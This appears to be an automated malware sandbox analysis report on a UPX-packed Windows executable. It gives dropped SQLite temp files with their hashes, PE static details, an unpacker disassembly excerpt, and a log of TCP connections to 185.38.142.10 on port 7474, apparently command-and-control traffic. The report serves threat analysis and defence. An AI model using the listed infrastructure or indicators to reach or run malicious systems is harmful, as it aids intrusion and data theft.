SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC457.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC477.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC488.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE1DC.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE1ED.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE1FD.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE1FE.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE20F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE220.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE230.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE241.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):	7.796206243772775
TrID:	Win32 Executable (generic) a (10002005/4) 99.39% UPX compressed Win32 Executable (30571/9) 0.30% Win32 EXE Yoda's Crypter (26571/9) 0.26% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	YPSvIjQCzd.exe
File size:	644'096 bytes
MD5:	901a623dbccaa22525373cd36195ee14
SHA1:	9adb6dddb68cd7e116da9392e7ee63a8fa394495
SHA256:	b5e250a95073b5dfe33f66c13cc89da0fc8d3af226e5efb06bb8fcfd9a4cd6ec
SHA512:	eabeba0eb9ae7e39577a7e313e50807cee1b888f1c8ff0fa375e5de9451a66471c791c23ea4f4af85151f96b065d55e8c1320026d8503a048a3e5968f8effc1d
SSDEEP:	12288:SYV6MorX7qzuC3QHO9FQVHPF51jgcN6S5UesUInNnpo2R2:hBXu9HGaVHN6S5U5Rn/Y
TLSH:	9BD4BDC3A81DEB18D8DB543DBC6B84B229A7FCFF516016246949FE3764341D12EEE809
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	0713133329251344

Static PE Info

General

Entrypoint:	0x51f090
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66792286 [Mon Jun 24 07:38:46 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fc6683d30d9f25244a50fd5357825e79

Entrypoint Preview

Instruction
pushad
mov esi, 004C9000h
lea edi, dword ptr [esi-000C8000h]
push edi
jmp 00007F0CC0D38BDDh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F0CC0D38BD9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F0CC0D38BBFh
mov eax, 00000001h
add ebx, ebx
jne 00007F0CC0D38BD9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F0CC0D38BDDh
jne 00007F0CC0D38BFAh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F0CC0D38BF1h
dec eax
add ebx, ebx
jne 00007F0CC0D38BD9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F0CC0D38BA6h
add ebx, ebx
jne 00007F0CC0D38BD9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007F0CC0D38C24h
xor ecx, ecx
sub eax, 03h
jc 00007F0CC0D38BE3h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F0CC0D38C47h
sar eax, 1
mov ebp, eax
jmp 00007F0CC0D38BDDh
add ebx, ebx
jne 00007F0CC0D38BD9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F0CC0D38B9Eh
inc ecx
add ebx, ebx
jne 00007F0CC0D38BD9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F0CC0D38B90h
add ebx, ebx
jne 00007F0CC0D38BD9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F0CC0D38BC1h
jne 00007F0CC0D38BDBh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F0CC0D38BB6h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h
lea edx, dword ptr [edi+ebp]
cmp ebp, FFFFFFFCh
jbe 00007F0CC0D38BE0h
mov al, byte ptr [edx]

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x166744	0x424	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x120000	0x46744	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x166b68	0xc	.rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x11f274	0x48	UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0xc8000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1	0xc9000	0x57000	0x56400	55e857d013226be95cff742963a58a99	False	0.9873697916666667	data	7.935446786005215	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x120000	0x47000	0x46c00	8259524639d53f3ef7231b33a993ef21	False	0.6943393882508834	data	7.417442496833852	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x12054c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0x120678	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0x1207a4	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0x1208d0	0x28e0	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	Great Britain	0.972381498470948
RT_ICON	0x1231b4	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m	English	Great Britain	0.09177215189873418
RT_ICON	0x1339e0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m	English	Great Britain	0.16479688238072746
RT_ICON	0x137c0c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m	English	Great Britain	0.25228215767634854
RT_ICON	0x13a1b8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m	English	Great Britain	0.3170731707317073
RT_ICON	0x13b264	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m	English	Great Britain	0.5434397163120568
RT_MENU	0xe36a8	0x50	data	English	Great Britain	1.1375
RT_STRING	0xe36f8	0x594	data	English	Great Britain	1.007703081232493
RT_STRING	0xe3c8c	0x68a	OpenPGP Secret Key	English	Great Britain	1.0065710872162486
RT_STRING	0xe4318	0x490	data	English	Great Britain	1.009417808219178
RT_STRING	0xe47a8	0x5fc	data	English	Great Britain	1.0071801566579635
RT_STRING	0xe4da4	0x65c	ARC archive data, dynamic LZW	English	Great Britain	1.0067567567567568
RT_STRING	0xe5400	0x466	data	English	Great Britain	1.0097690941385435
RT_STRING	0xe5868	0x158	data	English	Great Britain	1.0319767441860466
RT_RCDATA	0x13b6d0	0x2aaf6	data			1.0003488944051064
RT_GROUP_ICON	0x1661cc	0x5a	data	English	Great Britain	0.7777777777777778
RT_GROUP_ICON	0x16622c	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x166244	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x16625c	0x14	data	English	Great Britain	1.25
RT_VERSION	0x166274	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x166354	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll	GetAce
COMCTL32.dll	ImageList_Remove
COMDLG32.dll	GetOpenFileNameW
GDI32.dll	LineTo
IPHLPAPI.DLL	IcmpSendEcho
MPR.dll	WNetUseConnectionW
ole32.dll	CoGetObject
OLEAUT32.dll	VariantInit
PSAPI.DLL	GetProcessMemoryInfo
SHELL32.dll	DragFinish
USER32.dll	GetDC
USERENV.dll	LoadUserProfileW
UxTheme.dll	IsThemeActive
VERSION.dll	VerQueryValueW
WININET.dll	FtpOpenFileW
WINMM.dll	timeGetTime
WSOCK32.dll	connect

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 24, 2024 18:24:24.607145071 CEST	49708	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:24.612139940 CEST	7474	49708	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:24.612226963 CEST	49708	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:24.632993937 CEST	49708	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:24.637886047 CEST	7474	49708	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:24.989449024 CEST	49708	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:24.994451046 CEST	7474	49708	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:25.277416945 CEST	7474	49708	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:25.332973957 CEST	49708	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:25.401972055 CEST	7474	49708	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:25.442428112 CEST	49708	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:30.463136911 CEST	49708	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:30.468027115 CEST	7474	49708	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:30.754394054 CEST	7474	49708	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:30.754668951 CEST	49708	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:30.759509087 CEST	7474	49708	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:31.208231926 CEST	7474	49708	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:31.208256960 CEST	7474	49708	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:31.208266973 CEST	7474	49708	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:31.208277941 CEST	7474	49708	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:31.208292007 CEST	7474	49708	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:31.208302975 CEST	7474	49708	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:31.208327055 CEST	49708	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:31.208369970 CEST	49708	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.183870077 CEST	49708	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.184286118 CEST	49710	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.207237005 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.207318068 CEST	49710	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.209909916 CEST	49710	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.213242054 CEST	7474	49708	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.213305950 CEST	49708	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.215567112 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.567718983 CEST	49710	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.572736979 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.572778940 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.572794914 CEST	49710	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.572830915 CEST	49710	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.572830915 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.572874069 CEST	49710	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.572892904 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.572902918 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.572947025 CEST	49710	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.573009968 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.573041916 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.573045969 CEST	49710	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.573091984 CEST	49710	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.573101044 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.573111057 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.573139906 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.573156118 CEST	49710	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.573173046 CEST	49710	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.577800035 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.577811956 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.577857018 CEST	49710	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.577877998 CEST	49710	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.577941895 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.577954054 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.578001022 CEST	49710	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.578053951 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.578155994 CEST	49710	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.578290939 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.578335047 CEST	49710	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.625106096 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.625318050 CEST	49710	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.669567108 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.670746088 CEST	49710	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:34.676336050 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.676354885 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.676367044 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.676376104 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.676384926 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.676393032 CEST	7474	49710	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:34.676404953 CEST	7474	49710	185.38.142.10	192.168.2.7
